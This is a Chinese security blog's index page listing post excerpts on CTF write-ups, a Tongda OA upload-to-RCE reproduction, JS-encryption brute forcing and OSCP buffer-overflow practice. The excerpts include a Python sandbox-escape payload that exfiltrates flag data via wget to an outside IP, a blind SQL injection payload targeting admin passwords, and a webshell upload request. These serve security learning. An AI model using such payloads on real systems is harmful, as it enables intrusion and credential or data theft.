Ca1s1'Blog

Ca1s1'Blog

A student

观安杯2021 Writeup
WEBBaby Calc1234通过测试发现该环境为python3沙盒逃逸通过网上公开的POC发现存在代码执行,但是无法回显尝试反弹SHELL均失败发现系统不存在curl命令,但存在wget通过wget命令携带回显带出到vps 如下图使用wget,把命令包含在``中在使用base64带到vps中 1POC:expr=__import__("os").__getattribute__("metsys"[::-1])("wget%20http://49.234.223.23:1234/1.txt?data=`cat%20/flag_is_h...
卫生健康行业CTF
卫生健康行业CTFwebeasy_cms下载源码本地搭建环境,最下方cms名字叫闪灵搜索相关cms漏洞,发现前台存在一个sql延迟注入,构造poc1/**/AND/**/(if(ascii(substr((select/**/A_pwd/**/from/**/SL_admin/**/limit/**/0,1),1,1))<>50,1,sleep(3)))=xxx编写python脚本 12345678910111213141516171819202122232425262728#coding:utf-8#Author:Ca1s1import requestsimport tim...
虎符线下赛WEB
tinypng题目提供了源代码,通过php artisan 命令,可以看到是Laravel 8.15框架 首先查看路由信息 先查看一下fileupload路由,可以发现文件上传时对内容进行了过滤,且只允许上传png 接着我们看image路由,进入ImageController,$source可控接着判断是否为png结尾,如果为png结尾则传给imgcompress类。 进入imgcompress类,$this->src为我们传入的$source 接着又传递给compressImg类,调用了openImg方法 将$source传递给了getimagesize,getimages...
通达OA文件上传&文件包含导致RCE复现
漏洞复现影响版本:123456V11版2017版2016版2015版2013版2013增强版 测试环境:111.2.191129 漏洞复现:通过 /ispirit/im/upload.php 页面,未授权文件上传一个一句话文件,可获得路径和文件名。 12345678910111213141516171819202122232425262728293031323334353637POST /ispirit/im/upload.php HTTP/1.1Host: 192.168.235.7Content-Length: 656Cache-Control: no-cacheUser-Ag...
JEB_Debug_Encrypt(1)
JEB 动态调试 加密工具JEB3 BurpSuite Genymotion 操作先准备一个模拟器或安卓手机,配置好BurpSuite代理,可以抓取到如下数据包,Request和Response都已加密。 用Jeb3打开Apk,进入Bytecode菜单,点击下方的字符串,搜索dataStr双击进入。(为啥要搜索它? 因为它在提交数据中是个协议头, 添加这些参数的时候想必都会在一个代码块, 所以加密函数也可能在附近。) 进入后我们可以看到smali代码,在可疑的地方通过Ctrl+b可以下断点进行调试。 模拟器内需要先打开APP,然后点击上方虫子按钮,可以看到如下图所示,点击附上。 注...
2019神盾杯
首届“神盾杯”上海市网络安全竞赛,去年的比赛。 0x00 babyJS操作内容: 查看源码 找不到被调用的CheckLogin函数 看到script中有用到unespace和escape等函数 用于编码字符串 将eval传参改为alert 显示为弹窗 发现check函数 并将flag与用户输入做比较 得到flag FLAG值: flag{a5a5f402f6dc62acd3e848900a17513f} 0x01 crypto_easy_1操作内容: 下载文件 发现3行类似的数据 并且长度一致。 :左边的长度为42 右边的长度为56 ,猜测右边被base64编码过 进行解码 比较...
jsEncrypter 加密
burp 爆破 JS加密首先右键登录按钮属性查看html源代码,发现id=’rsa’ ctrl+shift+f 查找rsa描点,发现调用了strEnr 继续查找strEnr,并进入函数 对加密函数添加断点进行判断,发现123123账号密码进入了此处,且3个key分别为1,2,3。 我们直接控制台调用,尝试加密解密 保存des.js到本地 既然找到了加密解密函数现在就是通过burp调用函数使其加解密,修改phantomjs_server.js 载入server.js burp连接server端口,test,我们现在已经可以成功加密了 配置burp intruder,添加变...
整理OSCP备忘录
OSCP备忘录 参考链接 https://github.com/xuanhusec/OscpStudyGroup https://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/ https://github.com/RustyShackleford221/OSCP-Prep http://www.securityidiots.com/Web-Pentest 考试指南: https://www.lshack.cn/wp-content/uploads/2019/02/lshack.cn_2019-02-12_09-30-31...
OSCP-Buffer Overflows brainpan
OSCP-Buffer Overflows brainpanhttps://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice/tree/master/brainpan 1. 判断是否存在缓冲区溢出通过如下脚本判断是否存在缓冲区溢出点,发送900位时程序崩溃说明存在缓冲区溢出 12345678910111213141516171819#!/usr/bin/env python# coding=utf-8#!/usr/bin/pythonimport socketimport sysbuffer=...
avatar
Ca1s1
The great pleasure in life is doing what people say you cannot do.